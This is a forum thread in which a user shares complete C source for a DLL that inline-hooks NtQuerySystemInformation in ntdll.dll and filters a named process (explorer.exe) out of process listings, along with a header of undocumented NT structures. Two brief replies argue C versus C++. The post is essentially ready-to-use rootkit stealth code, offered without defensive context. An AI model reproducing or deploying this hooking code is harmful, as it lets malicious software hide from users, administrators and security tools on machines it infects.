1. To visit protected / private sections of the forum you must be connected with your user account. If you are not yet a member of our forum, you can create it now for free!.

User Tag List

Thread: [c] Process Hiding

Results 1 to 3 of 3

  1. #1
    Junior Member
    Join Date Aug 2010
    Posts 23
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    0 Post(s)

    [c] Process Hiding

    I didnt really see a good c example so I decided to share my dll that hooks NtQuerySystemInformation and hides explorer.exe

    Code:
    #include <Windows.h>
    #include "sysinfo.h"
    
    BYTE OrigBytes[5];
    WCHAR g_TargetProc[] = L"explorer.exe";
    
    __declspec(naked) NTSTATUS NTAPI  OriginalNtQuerySystemInformation(
    		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    		IN OUT PVOID SystemInformation,
    		IN ULONG SystemInformationLength,
    		OUT PULONG ReturnLength OPTIONAL
    	)
    {
        __asm
        {
    		mov eax, 0dfh //5 Bytes overwritten	with original read 5
            mov ecx, 0xcafebabe 
            jmp ecx             
        }
    }
    
    NTSTATUS NTAPI HookedNtQuerySystemInformation(
    		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    		IN OUT PVOID SystemInformation,
    		IN ULONG SystemInformationLength,
    		OUT PULONG ReturnLength OPTIONAL
    	)
    {
    	NTSTATUS Result;
    	PSYSTEM_PROCESSES pSystemProcess;
    	PSYSTEM_PROCESSES pNextSystemProcess;
    
    	Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
    
    	switch(SystemInformationClass)
    	{
    
    		case SystemProcessInformation:
    			
    			pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
    			pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
    
    			while(pNextSystemProcess->NextEntryDelta != 0)
    			{
    				if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
    					pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
    				}
    				pSystemProcess = pNextSystemProcess;
    				pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
    			}
    			break;
    
    	}
    
    	return Result;
    
    }
    
    
    DWORD PlaceHook()
    {
    	DWORD oldProtect;
    	LPVOID sourceFunction;
    	LPVOID destFunction;
    	LPVOID stubFunction;
    
    	destFunction = HookedNtQuerySystemInformation;
    	stubFunction = OriginalNtQuerySystemInformation;
    
    	sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
      	CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);
    
        if(sourceFunction == NULL){
            return 1;
        }
        
    	// PatchStub
        VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
    	CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
        *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
        VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);
    
        //PatchSource
    	VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
        *(LPBYTE)sourceFunction = 0xE9;
        *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
        VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);
        
    	return 0;
    }
    
    void UnHook()
    {
    	DWORD	oldProtect;
    
    	LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
    	VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    	CopyMemory(addr,OrigBytes,sizeof(BYTE)*5);
    	VirtualProtect(addr, 5, oldProtect, &oldProtect);
    }
     
    
    
    BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
    	
    	switch (dwReason){
    
    		case DLL_PROCESS_ATTACH:
    			PlaceHook();
    			break;
    		case DLL_PROCESS_DETACH:
    			UnHook();
    			break;
    	}
    
    	return TRUE;
    }
    and the header
    Code:
    #ifndef __SYSINFO_H__
    #define __SYSINFO_H__
    
    #ifndef NTSTATUS
    #define NTSTATUS LONG
    #endif
    
    #define NT_SUCCESS(x) ((x) >= 0)
    #define STATUS_SUCCESS	0x00000000
    
    typedef enum _SYSTEM_INFORMATION_CLASS {
    
    SystemBasicInformation, 
    SystemProcessorInformation, 
    SystemPerformanceInformation, 
    SystemTimeOfDayInformation, 
    SystemPathInformation, 
    SystemProcessInformation, 
    SystemCallCountInformation, 
    SystemDeviceInformation, 
    SystemProcessorPerformanceInformation, 
    SystemFlagsInformation, 
    SystemCallTimeInformation, 
    SystemModuleInformation, 
    SystemLocksInformation, 
    SystemStackTraceInformation, 
    SystemPagedPoolInformation, 
    SystemNonPagedPoolInformation, 
    SystemHandleInformation, 
    SystemObjectInformation, 
    SystemPageFileInformation, 
    SystemVdmInstemulInformation, 
    SystemVdmBopInformation, 
    SystemFileCacheInformation, 
    SystemPoolTagInformation, 
    SystemInterruptInformation, 
    SystemDpcBehaviorInformation, 
    SystemFullMemoryInformation, 
    SystemLoadGdiDriverInformation, 
    SystemUnloadGdiDriverInformation, 
    SystemTimeAdjustmentInformation, 
    SystemSummaryMemoryInformation, 
    SystemNextEventIdInformation, 
    SystemEventIdsInformation, 
    SystemCrashDumpInformation, 
    SystemExceptionInformation, 
    SystemCrashDumpStateInformation, 
    SystemKernelDebuggerInformation, 
    SystemContextSwitchInformation, 
    SystemRegistryQuotaInformation, 
    SystemExtendServiceTableInformation, 
    SystemPrioritySeperation, 
    SystemPlugPlayBusInformation, 
    SystemDockInformation, 
    SystemPowerInformation1, 
    SystemProcessorSpeedInformation, 
    SystemCurrentTimeZoneInformation, 
    SystemLookasideInformation
    
    } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
    
    typedef struct _LSA_UNICODE_STRING {
    	USHORT Length;
    	USHORT MaximumLength;
    	PWSTR  Buffer;
    }LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
    
    typedef CONST PUNICODE_STRING PCUNICODE_STRING;
    
    typedef LONG KPRIORITY;
    
    typedef struct _VM_COUNTERS {
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    } VM_COUNTERS;
    
    typedef struct _CLIENT_ID {
    DWORD UniqueProcess;
    DWORD UniqueThread;
    } CLIENT_ID;
    
    typedef struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    LONG State;
    LONG WaitReason;
    } SYSTEM_THREADS, * PSYSTEM_THREADS;
    
    typedef struct _SYSTEM_PROCESSES { 
    		ULONG NextEntryDelta;
    		ULONG ThreadCount;
    		ULONG Reserved1[6];
    		LARGE_INTEGER CreateTime;
    		LARGE_INTEGER UserTime;
    		LARGE_INTEGER KernelTime;
    		UNICODE_STRING ProcessName; 
    		KPRIORITY BasePriority;
    		ULONG ProcessId;
    		ULONG InheritedFromProcessId;
    		ULONG HandleCount;
    		ULONG Reserved2[2];
    		VM_COUNTERS VmCounters;
    		IO_COUNTERS IoCounters;  
    		SYSTEM_THREADS Threads[1];
    	} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
    
    
    
    typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
    		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    		IN OUT PVOID SystemInformation,
    		IN ULONG SystemInformationLength,
    		OUT PULONG ReturnLength OPTIONAL
    	);
    
    #endif
  2. #2
    subwar's Avatar
    Join Date Jan 2010
    Location 0x80000000
    Posts 42
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    0 Post(s)
    lawl, C > C++ any day. any goddamn day.
    If you are interested in learning C, C++, Assembly, Windows Internals, or Network Architecture
    Send me a PM. read here for details
  3. #3
    Modest's Avatar
    Senior Member
    Join Date Dec 2010
    Location retarded script kiddie
    Posts 103
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    0 Post(s)
    lawl, C > C++ any day. any goddamn day.
    >:| C++ without using retarded shit (stl, boost) is just as good as C :/

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Function call hiding?
    By Cr0s in forum Delphi Help
    Replies: 3
    Last Post: 02-03-2011, 17:21
  2. Hiding Process
    By und3rgr0und3r in forum General Programming Help
    Replies: 7
    Last Post: 05-03-2010, 22:49
  3. hiding an application...another way
    By blackcobra in forum VB Snippets
    Replies: 6
    Last Post: 01-06-2008, 11:40
  4. Replies: 1
    Last Post: 29-05-2008, 13:19
  5. hiding an application...another way
    By blackcobra in forum VB Snippets
    Replies: 2
    Last Post: 20-02-2006, 07:37

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts